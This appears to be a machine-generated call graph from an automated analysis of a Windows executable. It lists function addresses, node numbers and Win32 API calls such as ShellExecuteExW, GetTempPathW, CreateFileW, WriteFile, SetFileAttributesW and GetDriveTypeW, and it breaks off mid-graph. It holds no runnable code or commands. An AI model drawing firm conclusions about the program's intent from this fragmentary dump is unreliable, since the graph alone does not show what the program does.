??3@YAXPAX 9266->9272 9308 405a61 9266->9308 9756 4082e9 9266->9756 9273 4059a7 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9267->9273 9268->9240 9268->9241 9268->9247 9268->9254 9268->9258 9268->9264 9271 402f6c 7 API calls 9268->9271 9578 40243b 9268->9578 9735 402425 ??3@YAXPAX ??3@YAXPAX 9268->9735 9271->9268 9272->9266 9273->9170 9275->9265 9276 405910 ??3@YAXPAX 9276->9268 9277 401411 2 API calls 9277->9308 9279->9265 9280 405bd8 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9301 405bf3 9280->9301 9281 405a9f GetKeyState 9281->9308 9282 405c6c 9285 405ca2 9282->9285 9286 405c74 9282->9286 9283 401329 ??2@YAPAXI ??3@YAXPAX 9283->9308 9284 40243b lstrcmpW 9284->9308 9289 4012f7 2 API calls 9285->9289 9798 403f85 9286->9798 9292 405cb0 9289->9292 9295 403b59 15 API calls 9292->9295 9293 401362 2 API calls 9299 405c91 ??3@YAXPAX 9293->9299 9294->9170 9297 405cb9 9295->9297 9296 407776 55 API calls 9298 405c13 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9296->9298 9300 405cca ??3@YAXPAX 9297->9300 9304 401362 2 API calls 9297->9304 9298->9301 9305 405cd9 9299->9305 9300->9305 9301->9296 9302 405c4a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9301->9302 9302->9301 9303 405bcd ??3@YAXPAX 9303->9308 9304->9300 9306 405d24 9305->9306 9307 405d16 9305->9307 9811 40786b 9306->9811 9594 404a44 9307->9594 9308->9277 9308->9280 9308->9281 9308->9282 9308->9283 9308->9284 9308->9301 9308->9302 9308->9303 9311 401429 ??2@YAPAXI ??3@YAXPAX 9308->9311 9783 407613 9308->9783 9792 407674 9308->9792 9311->9308 9312 405d20 9313 405d65 9312->9313 9817 403e0d 9312->9817 9314 404034 21 API calls 9313->9314 9316 405d77 9314->9316 9318 406373 9316->9318 9319 401411 2 API calls 9316->9319 9321 4063f7 ctype 9318->9321 9324 40243b lstrcmpW 9318->9324 9320 405d95 9319->9320 9364 405da8 9320->9364 9821 40453e 9320->9821 9323 40643a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9321->9323 9329 40243b lstrcmpW 9321->9329 9325 406461 9323->9325 9326 406467 ??3@YAXPAX 9323->9326 9327 4063a4 9324->9327 9325->9326 9328 403e70 ctype 4 API calls 9326->9328 9327->9321 9848 403f48 9327->9848 9330 406478 ??3@YAXPAX ??3@YAXPAX 9328->9330 9332 406416 9329->9332 9330->9132 9331 401411 ??2@YAPAXI ??3@YAXPAX 9331->9364 9332->9323 9336 406423 9332->9336 9335 405dd8 9338 405de5 9335->9338 9339 4061fa ??3@YAXPAX ??3@YAXPAX 9335->9339 9341 4012f7 2 API calls 9336->9341 9337 4073d1 21 API calls 9342 4063e0 ??3@YAXPAX 9337->9342 9830 4043c6 9338->9830 9343 406312 9339->9343 9340 40243b lstrcmpW 9340->9364 9345 406432 9341->9345 9342->9321 9349 40636a ??3@YAXPAX 9343->9349 9350 404034 21 API calls 9343->9350 9853 404aff 9345->9853 9348 405e45 9352 401329 2 API calls 9348->9352 9349->9318 9354 406321 9350->9354 9355 405e4e 9352->9355 9353 4043c6 2 API calls 9356 405e0e 9353->9356 9838 4048ab 9354->9838 9360 403b7f 19 API calls 9355->9360 9361 401362 2 API calls 9356->9361 9358 40626b ??3@YAXPAX ??3@YAXPAX 9358->9343 9359 401329 2 API calls 9359->9364 9378 405e57 9360->9378 9362 405e1a ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9361->9362 9365 406211 9362->9365 9366 405e41 9362->9366 9363 40633a SetCurrentDirectoryW 9367 4048ab 4 API calls 9363->9367 9364->9331 9364->9335 9364->9340 9364->9348 9364->9358 9364->9359 9368 401429 2 API calls 9364->9368 9371 403e0d 16 API calls 9365->9371 9366->9348 9369 406362 9367->9369 9370 405ee5 ??3@YAXPAX ??3@YAXPAX 9368->9370 9372 403e0d 16 API calls 9369->9372 9370->9364 9373 406216 9371->9373 9372->9349 9374 407776 55 API calls 9373->9374 9375 40621f 7 API calls 9374->9375 9376 40625e 9375->9376 9376->9358 9377 403bce lstrlenW lstrlenW _wcsnicmp 9377->9378 9378->9377 9379 405f61 _wtol 9378->9379 9380 406025 9378->9380 9379->9378 9381 406080 9380->9381 9382 40602e 9380->9382 9383 401362 2 API calls 9381->9383 9384 406053 9382->9384 9385 406034 9382->9385 9386 40607e 9383->9386 9388 401329 2 API calls 9384->9388 9387 401329 2 API calls 9385->9387 9389 40254d 2 API calls 9386->9389 9390 40603f 9387->9390 9391 406051 9388->9391 9392 406092 9389->9392 9393 40254d 2 API calls 9390->9393 9394 40243b lstrcmpW 9391->9394 9395 401411 2 API calls 9392->9395 9396 406048 9393->9396 9397 406068 9394->9397 9398 40609a 9395->9398 9399 40254d 2 API calls 9396->9399 9397->9392 9401 40254d 2 API calls 9397->9401 9400 401411 2 API calls 9398->9400 9399->9391 9402 4060a2 memset 9400->9402 9401->9386 9403 4060e1 9402->9403 9404 404594 2 API calls 9403->9404 9405 4060fe 9404->9405 9406 401329 2 API calls 9405->9406 9407 406109 9406->9407 9408 403b7f 19 API calls 9407->9408 9409 406112 9408->9409 9410 4061b1 9409->9410 9614 4021ed 9409->9614 9412 4062ee ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9410->9412 9414 4061c5 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9410->9414 9412->9343 9414->9339 9415 406150 9417 403b7f 19 API calls 9415->9417 9416 401429 2 API calls 9418 406147 9416->9418 9419 406168 ShellExecuteExW 9417->9419 9420 40254d 2 API calls 9418->9420 9422 406282 9419->9422 9423 40618c 9419->9423 9420->9415 9426 407776 55 API calls 9422->9426 9424 4061a0 CloseHandle 9423->9424 9425 406192 WaitForSingleObject 9423->9425 9835 402185 9424->9835 9425->9424 9428 40628c 9426->9428 9429 403e0d 16 API calls 9428->9429 9430 406291 9 API calls 9429->9430 9431 4062e1 9430->9431 9431->9412 9433 401b6c SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9432->9433 9434 401b9f GetVersionExW 9432->9434 9433->9434 9434->9130 9434->9131 9436 40112b 2 API calls 9435->9436 9437 403e38 GetCommandLineW 9436->9437 9438 404594 9437->9438 9439 4045ce 9438->9439 9441 4045a2 9438->9441 9440 4045c6 9439->9440 9443 401429 2 API calls 9439->9443 9440->9142 9441->9440 9442 401429 2 API calls 9441->9442 9442->9441 9443->9439 9445 401411 2 API calls 9444->9445 9453 402a79 9445->9453 9446 401362 2 API calls 9447 402b6c ??3@YAXPAX 9446->9447 9447->9145 9448 402b5f 9448->9446 9450 401411 2 API calls 9450->9453 9451 401429 ??2@YAPAXI ??3@YAXPAX 9451->9453 9453->9448 9453->9450 9453->9451 9454 401362 2 API calls 9453->9454 9892 4025c6 9453->9892 9895 40272e 9453->9895 9455 402ad9 ??3@YAXPAX 9454->9455 9456 4013e2 2 API calls 9455->9456 9457 402aee ??3@YAXPAX ??3@YAXPAX 9456->9457 9457->9453 9459 403d80 9458->9459 9460 403dbd 9459->9460 9461 403d9a lstrlenW lstrlenW 9459->9461 9460->9149 9460->9151 9906 401a85 9461->9906 9464 401f47 3 API calls 9463->9464 9465 404416 9464->9465 9466 401f9d 19 API calls 9465->9466 9467 40441d 9466->9467 9468 401f9d 19 API calls 9467->9468 9469 404429 9468->9469 9470 401f9d 19 API calls 9469->9470 9471 404435 9470->9471 9472 401f9d 19 API calls 9471->9472 9473 404441 9472->9473 9474 401f9d 19 API calls 9473->9474 9475 40444d 9474->9475 9476 401f9d 19 API calls 9475->9476 9477 404459 9476->9477 9478 401f9d 19 API calls 9477->9478 9479 404465 9478->9479 9480 404480 SHGetSpecialFolderPathW 9479->9480 9483 404533 #17 9479->9483 9484 401411 2 API calls 9479->9484 9485 401329 ??2@YAPAXI ??3@YAXPAX 9479->9485 9487 402f6c 7 API calls 9479->9487 9911 402425 ??3@YAXPAX ??3@YAXPAX 9479->9911 9480->9479 9481 40449a wsprintfW 9480->9481 9482 401411 2 API calls 9481->9482 9482->9479 9483->9150 9484->9479 9485->9479 9487->9479 9489 4022b0 2 API calls 9488->9489 9490 4025c2 9489->9490 9490->9194 9912 403e86 9491->9912 9493 404e56 9494 403e86 2 API calls 9493->9494 9495 404e65 9494->9495 9916 404343 9495->9916 9499 404e82 ??3@YAXPAX 9500 404343 3 API calls 9499->9500 9501 404e9d 9500->9501 9502 403ec1 2 API calls 9501->9502 9503 404ea8 ??3@YAXPAX wsprintfA 9502->9503 9932 403ef6 9503->9932 9505 404ed0 9506 403ef6 2 API calls 9505->9506 9507 404edb 9506->9507 9508 402844 9507->9508 9509 402851 9508->9509 9517 40dcfb 3 API calls 9509->9517 9510 402863 lstrlenA lstrlenA 9515 402890 9510->9515 9511 40296e 9511->9206 9511->9208 9512 40293b memmove 9512->9511 9512->9515 9513 4028db memcmp 9513->9511 9513->9515 9514 402918 memcmp 9514->9515 9515->9511 9515->9512 9515->9513 9515->9514 9518 40dcc7 GetLastError 9515->9518 9943 402640 9515->9943 9517->9510 9518->9515 9520 40243b lstrcmpW 9519->9520 9521 40461c 9520->9521 9522 40466c 9521->9522 9524 401329 2 API calls 9521->9524 9523 40243b lstrcmpW 9522->9523 9525 40468a 9523->9525 9526 404633 9524->9526 9528 40243b lstrcmpW 9525->9528 9527 401f9d 19 API calls 9526->9527 9529 40463a 9527->9529 9531 4046a2 9528->9531 9530 40254d 2 API calls 9529->9530 9532 404643 9530->9532 9533 40243b lstrcmpW 9531->9533 9534 401329 2 API calls 9532->9534 9535 4046ba 9533->9535 9536 40465c 9534->9536 9538 40243b lstrcmpW 9535->9538 9537 401f9d 19 API calls 9536->9537 9539 404663 9537->9539 9540 4046d2 9538->9540 9541 40254d 2 API calls 9539->9541 9542 4046e9 9540->9542 9543 4046d9 lstrcmpiW 9540->9543 9541->9522 9544 40243b lstrcmpW 9542->9544 9543->9542 9545 4046ff 9544->9545 9546 40243b lstrcmpW 9545->9546 9547 40472c 9546->9547 9550 404739 9547->9550 9946 403d1f 9547->9946 9549 40243b lstrcmpW 9554 40474d 9549->9554 9550->9549 9551 40476d 9553 40243b lstrcmpW 9551->9553 9559 404780 9553->9559 9554->9551 9555 40243b lstrcmpW 9554->9555 9950 403cc6 9554->9950 9555->9554 9556 4047a0 9558 40243b lstrcmpW 9556->9558 9560 4047ac 9558->9560 9559->9556 9561 40243b lstrcmpW 9559->9561 9954 403cf7 9559->9954 9562 40243b lstrcmpW 9560->9562 9561->9559 9563 4047bd 9562->9563 9564 40243b lstrcmpW 9563->9564 9565 4047ce 9564->9565 9566 4047e4 9565->9566 9567 4047db _wtol 9565->9567 9568 40243b lstrcmpW 9566->9568 9567->9566 9569 4047f0 9568->9569 9570 404800 9569->9570 9571 4047f7 _wtol 9569->9571 9572 40243b lstrcmpW 9570->9572 9571->9570 9573 40480c 9572->9573 9574 40243b lstrcmpW 9573->9574 9575 404824 9574->9575 9576 40243b lstrcmpW 9575->9576 9577 40483c 9576->9577 9577->9265 9962 4023dd 9578->9962 9582 404045 9581->9582 9583 404088 9581->9583 9584 4012f7 2 API calls 9582->9584 9585 403b7f 19 API calls 9582->9585 9583->9245 9583->9246 9584->9582 9586 404062 SetEnvironmentVariableW ??3@YAXPAX 9585->9586 9586->9582 9586->9583 9588 40393b 7 API calls 9587->9588 9589 403b69 9588->9589 9590 4039f6 7 API calls 9589->9590 9591 403b74 9590->9591 9592 4027c7 6 API calls 9591->9592 9593 403b7a 9592->9593 9593->9266 9739 4083b6 9593->9739 9966 408676 9594->9966 9596 404a55 ??2@YAPAXI 9597 404a64 9596->9597 9611 40dcfb 3 API calls 9597->9611 9598 404a85 9968 40a7de _EH_prolog 9598->9968 9984 40b2fc 9598->9984 9599 404a95 9600 404ab3 9599->9600 9601 404a99 9599->9601 9603 404ada ??2@YAPAXI 9600->9603 9607 403354 86 API calls 9600->9607 9602 407776 55 API calls 9601->9602 9606 404aa1 9602->9606 9604 404ae6 9603->9604 9605 404aed 9603->9605 10009 404292 9604->10009 9990 40150b 9605->9990 9606->9312 9609 404ac6 9607->9609 9609->9603 9609->9606 9611->9598 9615 402200 LoadLibraryA GetProcAddress 9614->9615 9616 4021fb 9614->9616 9617 40221b 9615->9617 9618 402223 9615->9618 9616->9410 9616->9415 9616->9416 9617->9616 9618->9617 10472 4021b9 LoadLibraryA GetProcAddress 9618->10472 9621 40661a 2 API calls 9620->9621 9622 4049af 9621->9622 9623 401f9d 19 API calls 9622->9623 9624 4049bd 9623->9624 9625 4024fc 2 API calls 9624->9625 9626 4049c7 9625->9626 9627 4049fd 9626->9627 9629 40254d ??2@YAPAXI ??3@YAXPAX 9626->9629 9628 40254d 2 API calls 9627->9628 9630 404a0a 9628->9630 9629->9626 9631 401f9d 19 API calls 9630->9631 9632 404a11 9631->9632 9633 40254d 2 API calls 9632->9633 9634 404a1b 9633->9634 9635 4073d1 21 API calls 9634->9635 9636 404a30 ??3@YAXPAX 9635->9636 9637 404a41 ctype 9636->9637 9637->9170 9639 40e8da ctype 3 API calls 9638->9639 9640 403e7e 9639->9640 9641 40e8da ctype 3 API calls 9640->9641 9642 40e943 ??3@YAXPAX 9641->9642 9642->9164 9644 40db53 2 API calls 9643->9644 9645 404ce8 9644->9645 9646 404d44 9645->9646 9648 4024fc 2 API calls 9645->9648 9647 4025ae 2 API calls 9646->9647 9649 404d4c 9647->9649 9650 404cf7 9648->9650 9651 403e86 2 API calls 9649->9651 9654 404db5 ??3@YAXPAX 9650->9654 9656 403354 86 API calls 9650->9656 9652 404d59 9651->9652 9653 403ef6 2 API calls 9652->9653 9655 404d66 9653->9655 9668 404db1 9654->9668 9657 403ef6 2 API calls 9655->9657 9658 404d1b 9656->9658 9659 404d73 9657->9659 9658->9654 9661 40db53 2 API calls 9658->9661 9660 403ef6 2 API calls 9659->9660 9662 404d80 9660->9662 9663 404d37 9661->9663 9664 40dd5f 2 API calls 9662->9664 9663->9654 9665 404d3b ??3@YAXPAX 9663->9665 9666 404d94 9664->9666 9665->9646 9666->9654 9667 404d9d ??3@YAXPAX 9666->9667 9667->9668 9668->9229 9670 4025ae 2 API calls 9669->9670 9686 4030a8 9670->9686 9671 403301 9672 403344 ??3@YAXPAX 9671->9672 9673 40334e 9672->9673 9673->9215 9673->9221 9674 401411 ??2@YAPAXI ??3@YAXPAX 9674->9686 9676 40272e ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9676->9686 9677 401362 2 API calls 9678 4030f3 ??3@YAXPAX ??3@YAXPAX 9677->9678 9679 403303 9678->9679 9678->9686 10480 4029c3 9679->10480 9683 40331c ??3@YAXPAX 9683->9673 9684 4031e5 strncmp 9685 4031d0 strncmp 9684->9685 9684->9686 9685->9684 9685->9686 9686->9671 9686->9674 9686->9676 9686->9677 9686->9679 9686->9684 9687 401362 2 API calls 9686->9687 9688 402640 2 API calls 9686->9688 9691 402640 ??2@YAPAXI ??3@YAXPAX 9686->9691 9693 4023dd lstrcmpW 9686->9693 9694 402f6c 7 API calls 9686->9694 9696 403330 9686->9696 9697 4032b2 lstrcmpW 9686->9697 9701 401329 2 API calls 9686->9701 10474 402986 9686->10474 10479 402425 ??3@YAXPAX ??3@YAXPAX 9686->10479 9689 403252 ??3@YAXPAX 9687->9689 9688->9685 9690 402a69 9 API calls 9689->9690 9692 403263 lstrcmpW 9690->9692 9691->9686 9692->9686 9693->9686 9694->9686 9699 402f6c 7 API calls 9696->9699 9697->9686 9698 4032c0 lstrcmpW 9697->9698 9698->9686 9700 40333c 9699->9700 10498 402425 ??3@YAXPAX ??3@YAXPAX 9700->10498 9701->9686 9704 402f86 9703->9704 9705 402f7b 9703->9705 9707 408761 4 API calls 9704->9707 10500 402668 9705->10500 9708 402f92 9707->9708 9708->9219 9709->9219 9711 4024fc 2 API calls 9710->9711 9712 40485f 9711->9712 9713 40254d 2 API calls 9712->9713 9714 40486c 9713->9714 9715 404888 9714->9715 9716 401429 2 API calls 9714->9716 9717 40254d 2 API calls 9715->9717 9716->9714 9718 404892 9717->9718 9719 40408b 94 API calls 9718->9719 9720 40489d ??3@YAXPAX 9719->9720 9720->9265 9722 4040a2 lstrlenW 9721->9722 9723 4040ce 9721->9723 9724 401a85 4 API calls 9722->9724 9723->9265 9725 4040b8 9724->9725 9725->9722 9725->9723 9726 4040d5 9725->9726 9727 4024fc 2 API calls 9726->9727 9730 4040de 9727->9730 10505 402776 9730->10505 9731 403093 84 API calls 9732 40414c 9731->9732 9733 404156 ??3@YAXPAX ??3@YAXPAX 9732->9733 9734 40416d ??3@YAXPAX ??3@YAXPAX 9732->9734 9733->9723 9734->9723 9735->9276 9737 40661a 2 API calls 9736->9737 9738 403b48 9737->9738 9738->9263 9740 408646 9739->9740 9752 4083d5 ctype 9739->9752 9740->9272 9741 40661a 2 API calls 9741->9752 9742 40243b lstrcmpW 9742->9752 9743 40786b 23 API calls 9743->9752 9745 407674 23 API calls 9745->9752 9746 407613 23 API calls 9746->9752 9747 403b40 2 API calls 9747->9752 9748 401f9d 19 API calls 9748->9752 9749 403f48 4 API calls 9749->9752 9750 4073d1 21 API calls 9750->9752 9751 407776 55 API calls 9751->9752 9752->9740 9752->9741 9752->9742 9752->9743 9752->9745 9752->9746 9752->9747 9752->9748 9752->9749 9752->9750 9752->9751 9753 407717 25 API calls 9752->9753 9754 4073d1 21 API calls 9752->9754 10515 40744b 9752->10515 9753->9752 9755 408476 ??3@YAXPAX 9754->9755 9755->9752 9757 40243b lstrcmpW 9756->9757 9758 4082fd 9757->9758 9759 40830b 9758->9759 10519 4019f0 GetStdHandle WriteFile 9758->10519 9761 40831e 9759->9761 10520 4019f0 GetStdHandle WriteFile 9759->10520 9763 408333 9761->9763 10521 4019f0 GetStdHandle WriteFile 9761->10521 9767 408344 9763->9767 10522 4019f0 GetStdHandle WriteFile 9763->10522 9765 40243b lstrcmpW 9769 408351 9765->9769 9767->9765 9768 40835f 9771 40243b lstrcmpW 9768->9771 9769->9768 10523 4019f0 GetStdHandle WriteFile 9769->10523 9772 40836c 9771->9772 9773 40837a 9772->9773 10524 4019f0 GetStdHandle WriteFile 9772->10524 9775 40243b lstrcmpW 9773->9775 9776 408387 9775->9776 9777 408395 9776->9777 10525 4019f0 GetStdHandle WriteFile 9776->10525 9779 40243b lstrcmpW 9777->9779 9780 4083a2 9779->9780 9781 4083b2 9780->9781 10526 4019f0 GetStdHandle WriteFile 9780->10526 9781->9266 9784 407636 9783->9784 9785 407658 9784->9785 9786 40764b 9784->9786 10530 407186 9785->10530 10527 407154 9786->10527 9789 407653 9790 4073d1 21 API calls 9789->9790 9791 407671 9790->9791 9791->9308 9793 407689 9792->9793 9794 40716d 2 API calls 9793->9794 9795 407694 9794->9795 9796 4073d1 21 API calls 9795->9796 9797 4076a5 9796->9797 9797->9308 9799 401411 2 API calls 9798->9799 9800 403f96 9799->9800 9801 402535 2 API calls 9800->9801 9802 403f9f GetTempPathW 9801->9802 9803 403fb8 9802->9803 9808 403fcf 9802->9808 9804 402535 2 API calls 9803->9804 9805 403fc3 GetTempPathW 9804->9805 9805->9808 9806 402535 2 API calls 9807 403ff2 wsprintfW 9806->9807 9807->9808 9808->9806 9809 404009 GetFileAttributesW 9808->9809 9810 40402d 9808->9810 9809->9808 9809->9810 9810->9293 9812 40787e 9811->9812 10536 40719f 9812->10536 9815 4073d1 21 API calls 9816 4078b3 9815->9816 9816->9312 9818 403e21 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9817->9818 9819 403e16 9817->9819 9818->9313 9820 402c86 16 API calls 9819->9820 9820->9818 9822 40243b lstrcmpW 9821->9822 9823 40455d 9822->9823 9824 404592 9823->9824 9825 401329 2 API calls 9823->9825 9824->9364 9826 40456c 9825->9826 9827 403b7f 19 API calls 9826->9827 9828 404572 9827->9828 9828->9824 9829 401429 2 API calls 9828->9829 9829->9824 9831 4012f7 2 API calls 9830->9831 9832 4043d4 9831->9832 9833 40254d 2 API calls 9832->9833 9834 4043df 9833->9834 9834->9353 9836 4021a9 9835->9836 9837 40218e LoadLibraryA GetProcAddress 9835->9837 9836->9410 9837->9836 9839 401411 2 API calls 9838->9839 9846 4048bc 9839->9846 9840 401329 2 API calls 9840->9846 9841 40494e 9842 404988 ??3@YAXPAX 9841->9842 9844 4048ab 3 API calls 9841->9844 9842->9363 9843 401429 2 API calls 9843->9846 9845 404985 9844->9845 9845->9842 9846->9840 9846->9841 9846->9843 9847 40243b lstrcmpW 9846->9847 9847->9846 9849 40661a 2 API calls 9848->9849 9850 403f50 9849->9850 9851 401411 2 API calls 9850->9851 9852 403f5e 9851->9852 9852->9337 9854 404cb1 ??3@YAXPAX 9853->9854 9855 404b15 9853->9855 9857 404cb7 9854->9857 9855->9854 9856 404b29 GetDriveTypeW 9855->9856 9856->9854 9858 404b55 9856->9858 9857->9323 9859 403f85 6 API calls 9858->9859 9860 404b63 CreateFileW 9859->9860 9861 404b89 9860->9861 9862 404c7b ??3@YAXPAX ??3@YAXPAX 9860->9862 9863 401411 2 API calls 9861->9863 9862->9857 9864 404b92 9863->9864 9865 401329 2 API calls 9864->9865 9866 404b9f 9865->9866 9867 40254d 2 API calls 9866->9867 9868 404bad 9867->9868 9869 4013e2 2 API calls 9868->9869 9870 404bb9 9869->9870 9871 40254d 2 API calls 9870->9871 9872 404bc7 9871->9872 9873 40254d 2 API calls 9872->9873 9874 404bd4 9873->9874 9875 4013e2 2 API calls 9874->9875 9876 404be0 9875->9876 9877 40254d 2 API calls 9876->9877 9878 404bed 9877->9878 9879 40254d 2 API calls 9878->9879 9880 404bf6 9879->9880 9881 4013e2 2 API calls 9880->9881 9882 404c02 9881->9882 9883 40254d 2 API calls 9882->9883 9884 404c0b 9883->9884 9885 402776 3 API calls 9884->9885 9886 404c1d WriteFile ??3@YAXPAX CloseHandle 9885->9886 9887 404c4b 9886->9887 9888 404c8c 9886->9888 9887->9888 9889 404c53 SetFileAttributesW ShellExecuteW ??3@YAXPAX 9887->9889 9890 402c86 16 API calls 9888->9890 9889->9862 9891 404c94 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9890->9891 9891->9857 9901 4022b0 9892->9901 9896 401411 2 API calls 9895->9896 9897 40273a 9896->9897 9898 402772 9897->9898 9899 402535 2 API calls 9897->9899 9898->9453 9900 402757 MultiByteToWideChar 9899->9900 9900->9898 9902 4022be ??2@YAPAXI 9901->9902 9903 4022ea 9901->9903 9902->9903 9904 4022cf ??3@YAXPAX 9902->9904 9903->9453 9904->9903 9907 401ae3 9906->9907 9910 401a97 9906->9910 9907->9460 9908 401abc CharUpperW CharUpperW 9909 401af3 CharUpperW CharUpperW 9908->9909 9908->9910 9909->9907 9910->9907 9910->9908 9911->9479 9913 403e9e 9912->9913 9914 4022b0 2 API calls 9913->9914 9915 403eac 9914->9915 9915->9493 9917 40435e 9916->9917 9918 404375 9917->9918 9919 40436a 9917->9919 9920 4025ae 2 API calls 9918->9920 9936 4025f6 9919->9936 9922 40437e 9920->9922 9923 4022b0 2 API calls 9922->9923 9924 404387 9923->9924 9926 4025f6 2 API calls 9924->9926 9925 404373 9928 403ec1 9925->9928 9927 4043b5 ??3@YAXPAX 9926->9927 9927->9925 9929 403ecd 9928->9929 9931 403ede 9928->9931 9930 4022b0 2 API calls 9929->9930 9930->9931 9931->9499 9933 403f06 9932->9933 9933->9933 9939 4022fc 9933->9939 9935 403f13 9935->9505 9937 4022b0 2 API calls 9936->9937 9938 402610 9937->9938 9938->9925 9940 402340 9939->9940 9941 402310 9939->9941 9940->9935 9942 4022b0 2 API calls 9941->9942 9942->9940 9944 4022fc 2 API calls 9943->9944 9945 40264a 9944->9945 9945->9515 9947 403d3d 9946->9947 9958 403c63 9947->9958 9951 403cd3 9950->9951 9952 403c63 _wtol 9951->9952 9953 403cf4 9952->9953 9953->9554 9955 403d04 9954->9955 9956 403c63 _wtol 9955->9956 9957 403d1c 9956->9957 9957->9559 9959 403c6d 9958->9959 9960 403c88 _wtol 9959->9960 9961 403cc1 9959->9961 9960->9959 9961->9550 9963 4023e8 9962->9963 9964 4023f4 lstrcmpW 9963->9964 9965 402411 9963->9965 9964->9963 9964->9965 9965->9268 9967 408679 9966->9967 9967->9596 9969 40a7fe 9968->9969 9970 40b2fc 11 API calls 9969->9970 9971 40a823 9970->9971 9972 40a845 9971->9972 9973 40a82c 9971->9973 10014 40cc59 _EH_prolog 9972->10014 10017 40a3fe 9973->10017 9985 40b30d 9984->9985 9989 40dcfb 3 API calls 9985->9989 9986 40b321 9987 40b331 9986->9987 10453 40b163 9986->10453 9987->9599 9989->9986 9991 40151e 9990->9991 9992 401329 2 API calls 9991->9992 9993 40152b 9992->9993 9994 401429 2 API calls 9993->9994 9995 401534 CreateThread 9994->9995 9996 401563 9995->9996 9997 401568 WaitForSingleObject 9995->9997 10466 40129c 9995->10466 9998 40786b 23 API calls 9996->9998 9999 401585 9997->9999 10000 4015b7 9997->10000 9998->9997 10003 4015a3 9999->10003 10006 401594 9999->10006 10001 4015b3 10000->10001 10002 4015bf GetExitCodeThread 10000->10002 10001->9606 10004 4015d6 10002->10004 10005 407776 55 API calls 10003->10005 10004->10001 10004->10006 10007 401605 SetLastError 10004->10007 10005->10001 10006->10001 10008 407776 55 API calls 10006->10008 10007->10006 10008->10001 10010 401411 2 API calls 10009->10010 10011 4042ab 10010->10011 10012 401411 2 API calls 10011->10012 10013 4042b7 10012->10013 10013->9605 10025 40c9fc 10014->10025 10436 40a28e 10017->10436 10047 40a0bf 10025->10047 10181 40a030 10047->10181 10182 40e8da ctype 3 API calls 10181->10182 10183 40a039 10182->10183 10184 40e8da ctype 3 API calls 10183->10184 10185 40a041 10184->10185 10186 40e8da ctype 3 API calls 10185->10186 10187 40a049 10186->10187 10188 40e8da ctype 3 API calls 10187->10188 10189 40a051 10188->10189 10190 40e8da ctype 3 API calls 10189->10190 10191 40a059 10190->10191 10192 40e8da ctype 3 API calls 10191->10192 10193 40a061 10192->10193 10194 40e8da ctype 3 API calls 10193->10194 10195 40a06b 10194->10195 10196 40e8da ctype 3 API calls 10195->10196 10197 40a073 10196->10197 10198 40e8da ctype 3 API calls 10197->10198 10199 40a080 10198->10199 10200 40e8da ctype 3 API calls 10199->10200 10201 40a088 10200->10201 10202 40e8da ctype 3 API calls 10201->10202 10203 40a095 10202->10203 10204 40e8da ctype 3 API calls 10203->10204 10205 40a09d 10204->10205 10206 40e8da ctype 3 API calls 10205->10206 10207 40a0aa 10206->10207 10208 40e8da ctype 3 API calls 10207->10208 10209 40a0b2 10208->10209 10437 40e8da ctype 3 API calls 10436->10437 10438 40a29c 10437->10438 10454 40f0b6 GetLastError 10453->10454 10456 40b17e 10454->10456 10455 40b192 10455->9987 10456->10455 10457 40adc3 3 API calls 10456->10457 10458 40b1b6 memcpy 10457->10458 10463 40b1d9 10458->10463 10459 40b297 ??3@YAXPAX 10459->10455 10460 40b2a2 ??3@YAXPAX 10460->10455 10462 40b27a memmove 10462->10463 10463->10459 10463->10460 10463->10462 10464 40b2ac memcpy 10463->10464 10465 40dcfb 3 API calls 10464->10465 10465->10460 10467 4012a5 10466->10467 10468 4012b8 10466->10468 10467->10468 10469 4012a7 Sleep 10467->10469 10470 4012f1 10468->10470 10471 4012e3 EndDialog 10468->10471 10469->10467 10471->10470 10473 4021db 10472->10473 10473->9617 10475 4025ae 2 API calls 10474->10475 10476 402992 10475->10476 10477 4029be 10476->10477 10478 402640 2 API calls 10476->10478 10477->9686 10478->10476 10479->9686 10481 4029d2 10480->10481 10482 4029de 10480->10482 10499 4019f0 GetStdHandle WriteFile 10481->10499 10484 4025ae 2 API calls 10482->10484 10488 4029e8 10484->10488 10485 4029d9 10497 402425 ??3@YAXPAX ??3@YAXPAX 10485->10497 10486 402a13 10487 40272e 3 API calls 10486->10487 10489 402a25 10487->10489 10488->10486 10492 402640 2 API calls 10488->10492 10490 402a33 10489->10490 10491 402a47 10489->10491 10493 407776 55 API calls 10490->10493 10494 407776 55 API calls 10491->10494 10492->10488 10495 402a42 ??3@YAXPAX ??3@YAXPAX 10493->10495 10494->10495 10495->10485 10497->9683 10498->9672 10499->10485 10501 4012f7 2 API calls 10500->10501 10502 402676 10501->10502 10503 4012f7 2 API calls 10502->10503 10504 402682 10503->10504 10504->9704 10506 4025ae 2 API calls 10505->10506 10507 402785 10506->10507 10508 4027c1 10507->10508 10511 402628 10507->10511 10508->9731 10512 402634 10511->10512 10513 40263a WideCharToMultiByte 10511->10513 10514 4022b0 2 API calls 10512->10514 10513->10508 10514->10513 10516 407456 10515->10516 10517 40745b 10515->10517 10516->9752 10517->10516 10518 4073d1 21 API calls 10517->10518 10518->10516 10519->9759 10520->9761 10521->9763 10522->9767 10523->9768 10524->9773 10525->9777 10526->9781 10528 40661a 2 API calls 10527->10528 10529 40715c 10528->10529 10529->9789 10533 40716d 10530->10533 10534 40661a 2 API calls 10533->10534 10535 407175 10534->10535 10535->9789 10537 40661a 2 API calls 10536->10537 10538 4071a7 10537->10538 10538->9815 8035 40f3f1 8038 4024e7 8035->8038 8043 40245a 8038->8043 8041 4024f5 8042 4024f6 malloc 8044 40246a 8043->8044 8050 402466 8043->8050 8045 40247a GlobalMemoryStatusEx 8044->8045 8044->8050 8046 402488 8045->8046 8045->8050 8046->8050 8051 401f9d 8046->8051 8050->8041 8050->8042 8052 401fb4 8051->8052 8053 401fe5 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8052->8053 8057 401fdb 8052->8057 8054 402095 